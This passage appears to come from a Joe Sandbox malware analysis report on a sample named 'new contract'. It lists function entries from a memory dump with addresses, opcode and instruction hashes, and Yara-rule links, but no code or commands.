                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f304b6688a89c8a91fe00424c0e75693edb4c9c6d44d5f669d4855e3f350bf76
                                                                                                                                                                            • Instruction ID: e5f508b1862b72fa6ba2e03f32281515b54bf80f90ab7cdd77e86369db451949
                                                                                                                                                                            • Opcode Fuzzy Hash: f304b6688a89c8a91fe00424c0e75693edb4c9c6d44d5f669d4855e3f350bf76
                                                                                                                                                                            • Instruction Fuzzy Hash: F4112973784A11BFE72256999C01F27769ADBD4B60F91006CF759CB280EB70DC01879A
                                                                                                                                                                            Function 016A0946 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: df0196809b2df764739db828f563afcc3d7a111be1e279b27290b78dec1c6896
                                                                                                                                                                            • Instruction ID: 8427c8e1b3323411e60e320db90be9f39bf188e506bdb6a3a811089cbc80fa59
                                                                                                                                                                            • Opcode Fuzzy Hash: df0196809b2df764739db828f563afcc3d7a111be1e279b27290b78dec1c6896
                                                                                                                                                                            • Instruction Fuzzy Hash: AA21D4B1E00219ABCB24DFAAD8809AEFBF9FF99710F10412EE405A7254DB749941CF54
                                                                                                                                                                            Function 016B80A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                            • Instruction ID: 157c3226c56c9792e13da7f0563adddf03877fa680374fd48957f6a839753d17
                                                                                                                                                                            • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                            • Instruction Fuzzy Hash: 46216A72A0020AAFDB129F98CC80BEEBBBEEF88311F244459F901A7251D734D9918B50
                                                                                                                                                                            Function 01650124 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                            • Instruction ID: ef359d0b9f8551fd334df26c59769fcd8dfbdf5311d674fbfda2743a337f36a2
                                                                                                                                                                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                            • Instruction Fuzzy Hash: 31110173601605BFE7229F88CC40F9ABBB9EB80755F10002DFE018B280E671ED44CB65
                                                                                                                                                                            Function 01628770 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 64f9f2282f15afc04147de8e3c7a5ce93ace6cb9f2d26efe54525e45fec0bae0
                                                                                                                                                                            • Instruction ID: 7564f8bc13e155144a5de5e2433cfda1367d4d3928a11bced8ad23245185a3c7
                                                                                                                                                                            • Opcode Fuzzy Hash: 64f9f2282f15afc04147de8e3c7a5ce93ace6cb9f2d26efe54525e45fec0bae0
                                                                                                                                                                            • Instruction Fuzzy Hash: D211B271701A319BDB11CF4DCC80A6ABBEDAF5A710B19406DEE089F305D7B2D9018F90
                                                                                                                                                                            Function 0165AAEE Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                                            • Instruction ID: 14410992161741f3bfbb3e624077dd7d9e3ac72b8b4a889d6eb2af9a95367527
                                                                                                                                                                            • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                                            • Instruction Fuzzy Hash: C2218B72600641DFDB758F89C940A66FBE6EB94B10F148A3DE94A87710E730EC01CB80
                                                                                                                                                                            Function 016280E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2c428bd23cb319fa6cf14ce09c72bacedef094e0d9cdfbf3a02c4b086952c149
                                                                                                                                                                            • Instruction ID: 87d7bb335dc30582ee92442e66c20209651ac72be2a7b777f2b832fc03e447ff
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c428bd23cb319fa6cf14ce09c72bacedef094e0d9cdfbf3a02c4b086952c149
                                                                                                                                                                            • Instruction Fuzzy Hash: 0E214C75A00616DFCB14CF58C981AAABBF9FB88319F34816DD105A7391C771AD16CF90
                                                                                                                                                                            Function 0165674D Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 72024d4c2afa6640f15083521983167a89511fe93445aefd4285991c78bec079
                                                                                                                                                                            • Instruction ID: 8559f71f09d5b8ec0c1170d2191fa429fecf6207188be17b1a14de3d885f3d70
                                                                                                                                                                            • Opcode Fuzzy Hash: 72024d4c2afa6640f15083521983167a89511fe93445aefd4285991c78bec079
                                                                                                                                                                            • Instruction Fuzzy Hash: E9216A71600A00EFD7608F69CC80B66B7E9FB84350F84882DE9AAC7650DB70E841CB64
                                                                                                                                                                            Function 016B6870 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 755185fd4f447eb454d73b7dcabff4dfb5e7d69eeacee646da23fdd5b57269c1
                                                                                                                                                                            • Instruction ID: 3eb40640323d053b30c1112d8725e487ba5f7178b64a32e40b980d01a34b50aa
                                                                                                                                                                            • Opcode Fuzzy Hash: 755185fd4f447eb454d73b7dcabff4dfb5e7d69eeacee646da23fdd5b57269c1
                                                                                                                                                                            • Instruction Fuzzy Hash: 2F119132240515EBD722EB9DCD80FDA77A9EB95660F114029F2059B251DA70E941C7A0
                                                                                                                                                                            Function 0164E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0c06bb0bd38046b6a8f0b30f83706f4f73c7d4aa40e047126981ec83f8121b4f
                                                                                                                                                                            • Instruction ID: d7e75b6f5b2c0caa794b950fc8831e6da550b377bb56b3f4ed0320b85e8db3a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c06bb0bd38046b6a8f0b30f83706f4f73c7d4aa40e047126981ec83f8121b4f
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A112637305114AFCB19DB29CC81A6BB267EFD6374B25453DEA22CB391EA71D842C394
                                                                                                                                                                            Function 016566B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: db533a0ce8437c27b7b29f09a8b7e34ec620369a5c7f2f75bfe3545f51c65d8e
                                                                                                                                                                            • Instruction ID: b820310ce6899f9fa842c351c6c9b9f8c9e7d67d99d81be6d9e707bea5cc10df
                                                                                                                                                                            • Opcode Fuzzy Hash: db533a0ce8437c27b7b29f09a8b7e34ec620369a5c7f2f75bfe3545f51c65d8e
                                                                                                                                                                            • Instruction Fuzzy Hash: BA11BC76A012059BCB65CF59CD80A6ABBE9AB84620F41807DED059B311E770DD00CBA4
                                                                                                                                                                            Function 016EA8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                            • Instruction ID: 0edaf4779cbb109d7ad1ea36c5bcd8ec38fcc8b0a29c67ee8990f5dfd5f8e609
                                                                                                                                                                            • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                            • Instruction Fuzzy Hash: 08110436A10905AFDB19CB98CC05B9DBBF6EF84310F058269EC4597380E671AD11CBC0
                                                                                                                                                                            Function 01620AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                                                            • Instruction ID: be80aa101ad0c63d347a3bc4c24b28879f5e200c141be5c056d3499072a45f84
                                                                                                                                                                            • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                                                            • Instruction Fuzzy Hash: F721E2B5A00B059FD3A0CF29C840B52BBE4FB48B10F10492EE98AC7B40E371E814CB94
                                                                                                                                                                            Function 016AE7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                            • Instruction ID: 7720133affdc565300b75cf0c0a4f19f5e45934ee3799fc8dc8ea5f9c2701471
                                                                                                                                                                            • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A11C232600601EFE7219F48CC40B56BBE6EF85754F46842CEA0A9B260DB32DD40DFA0
                                                                                                                                                                            Function 016427ED Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 51360da2fc8236184c7304c477dea884131305a3c05ffb8d5a4f64e12cbe06c7
                                                                                                                                                                            • Instruction ID: bb76ccb2447c567ea80c43d2abf1f7fe20e056e5b7f956f022378d2038677fc5
                                                                                                                                                                            • Opcode Fuzzy Hash: 51360da2fc8236184c7304c477dea884131305a3c05ffb8d5a4f64e12cbe06c7
                                                                                                                                                                            • Instruction Fuzzy Hash: CE010472605645AFF316A6ADEC98F6B7A8DEF80390F160069FD00CB341DA14DC01C275
                                                                                                                                                                            Function 01624690 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 67f357dead2792246e84333172c30f3925a10ffcdbe830539cba519339c3fd36
                                                                                                                                                                            • Instruction ID: 7f8514ef4ce3d7fe5a78bf12822abd4a14a425a3ad45cf8fa9812d51baeda750
                                                                                                                                                                            • Opcode Fuzzy Hash: 67f357dead2792246e84333172c30f3925a10ffcdbe830539cba519339c3fd36
                                                                                                                                                                            • Instruction Fuzzy Hash: 7311C236200A65AFDB25CF59DC80F667BA9EB85764F004519FA288B750CB71E800CF60
                                                                                                                                                                            Function 016F4B00 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ee5a55da8d91936379d856e41fb39d1889ab4d8d907f2460e2694510ed1b0706
                                                                                                                                                                            • Instruction ID: 082e86b85590d4cb0f8f9fd823aab096b2a884122df29baa80a2df2fcf63a289
                                                                                                                                                                            • Opcode Fuzzy Hash: ee5a55da8d91936379d856e41fb39d1889ab4d8d907f2460e2694510ed1b0706
                                                                                                                                                                            • Instruction Fuzzy Hash: A011E0322006059BD7229A29DC44B67B7A6FFC4210F14442DEB4287B91DF30A802CB90
                                                                                                                                                                            Function 01656620 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: de24391a5249a0ebe51175bdf7153b8b3b048738d99a74042c9a0ed90ccdebbe
                                                                                                                                                                            • Instruction ID: 95f9369d0c928d7d685a2d5b55a0e63953674ac4a999cd1b257d94bbf3ef20ff
                                                                                                                                                                            • Opcode Fuzzy Hash: de24391a5249a0ebe51175bdf7153b8b3b048738d99a74042c9a0ed90ccdebbe
                                                                                                                                                                            • Instruction Fuzzy Hash: 8111CE72A01626ABDB21DF59CD80B5EFBB9EF88750F900068EE01A7300D730AD01CBA5
                                                                                                                                                                            Function 0164EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0569ef2a552e51e069a3d7431bf331dd3bb2dfb4a02e4a7624d90b6843e9ff55
                                                                                                                                                                            • Instruction ID: 11fb1ab6ea9b9969f7724a7f04dab5990f716b34b4a45791b02320c0a15e2192
                                                                                                                                                                            • Opcode Fuzzy Hash: 0569ef2a552e51e069a3d7431bf331dd3bb2dfb4a02e4a7624d90b6843e9ff55
                                                                                                                                                                            • Instruction Fuzzy Hash: 9201D27150010A9FC329DF1CD844F26BBFAFBC6724F20816EE0048B264D7749C82CB94
                                                                                                                                                                            Function 0164E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                            • Instruction ID: 54f8179331011726ab4b46c89674e138461f5b74e4b4dd9d0599dc1afdf383ff
                                                                                                                                                                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                            • Instruction Fuzzy Hash: B3118E722016C2DBEB26A72CDD58B257B94FB41758F1901E0EE41CB792F72EC842C2A0
                                                                                                                                                                            Function 016AE75D Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                            • Instruction ID: 91c1d9b6fd424ffe47dbd65f181c33a0aa0d836e0fb984e3fab2670320275928
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                            • Instruction Fuzzy Hash: 89019236700615AFE7219F58CC40F7A7EAAEB85750F458428EA059B260E772ED41CF94
                                                                                                                                                                            Function 0161A250 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                            • Instruction ID: 1fc1c22084cdd101d16e8724c362ebc1707614342a24113f20feacf6cb93cd3c
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                            • Instruction Fuzzy Hash: F00126714067619BCB318F59DC40AB27BA9EF55760B08C62DFC958B285C331D401CB60
                                                                                                                                                                            Function 016F4940 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4cb087ac9d69072ead517004126850c60c3d2660bdc7d6eba37c6807c3ca4280
                                                                                                                                                                            • Instruction ID: a4fccbc8259fed37d647ae07b414b4ceec3258ca47f8bc2c098d1cdbac3879c9
                                                                                                                                                                            • Opcode Fuzzy Hash: 4cb087ac9d69072ead517004126850c60c3d2660bdc7d6eba37c6807c3ca4280
                                                                                                                                                                            • Instruction Fuzzy Hash: 7C01D6726415019FC732DF1CDC40E13B7A9EB91770B15425DEA689B696EB30D801C7D0
                                                                                                                                                                            Function 0169E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: bc0131e0e2fa1b4c7a1be9584749a12cd38fce75c68bc95a5c60efb2d84a45a2
                                                                                                                                                                            • Instruction ID: 33439ecc6663618f2f242490c3657edf40226af28d1b20243128d9ebff8a3592
                                                                                                                                                                            • Opcode Fuzzy Hash: bc0131e0e2fa1b4c7a1be9584749a12cd38fce75c68bc95a5c60efb2d84a45a2
                                                                                                                                                                            • Instruction Fuzzy Hash: E711AD32241641EFDB15EF19CD90F16BBB9FF58B44F2000A9F9059B661C336ED01CA94
                                                                                                                                                                            Function 01626259 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d41e300aff6ba72f0c5bf6c6e6c19ebe9ebc5865c064a27dc275f26db38ac285
                                                                                                                                                                            • Instruction ID: 301df78779f7e555342fb49b0086fa417c56455ab81b2f4cd65e687ad9f07f5b
                                                                                                                                                                            • Opcode Fuzzy Hash: d41e300aff6ba72f0c5bf6c6e6c19ebe9ebc5865c064a27dc275f26db38ac285
                                                                                                                                                                            • Instruction Fuzzy Hash: 1311C270502229ABDB25EF28CC51FE87379FF04714F5081D8A718A61E0D7709E81CF88
                                                                                                                                                                            Function 016A6050 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 450e5137e5c1d82b8166378f0406980dc34af4d7f0f56dd2f3273925dd5dc809
                                                                                                                                                                            • Instruction ID: 19aae316fc665b2dec3608e027daaedb4738e8d93d19a389f55f1ae6bfd235c8
                                                                                                                                                                            • Opcode Fuzzy Hash: 450e5137e5c1d82b8166378f0406980dc34af4d7f0f56dd2f3273925dd5dc809
                                                                                                                                                                            • Instruction Fuzzy Hash: D5112973900119ABCB15DB98CC80DDFBB7DEF48258F044166E906E7211EA34EA55CBE0
                                                                                                                                                                            Function 0162208A Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                            • Instruction ID: cce6d9155c1fb802c17a5b07d6f950e247d51d3b9a9a1b33b884630d857824fd
                                                                                                                                                                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                            • Instruction Fuzzy Hash: 7101F1326005208BEF118A6DDC90EA2776BBFC4600F1540ADEE158F346DB758C81CBA0
                                                                                                                                                                            Function 016B6500 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
